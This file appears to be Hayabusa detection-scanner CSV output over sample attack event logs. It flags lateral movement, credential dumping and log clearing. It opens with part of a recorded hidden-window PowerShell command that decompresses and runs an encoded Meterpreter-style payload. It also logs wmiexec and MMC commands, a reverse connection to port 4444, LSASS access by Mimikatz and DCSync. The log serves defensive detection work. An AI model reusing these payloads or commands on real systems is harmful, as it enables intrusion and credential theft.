Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command 
Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 
365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 
365ABB72-B0F3-5CC8-0000-0010B1361D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent 
Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 
+09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 
+09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | 
Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 
365ABB72-8077-5CCB-0000-0010F2590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
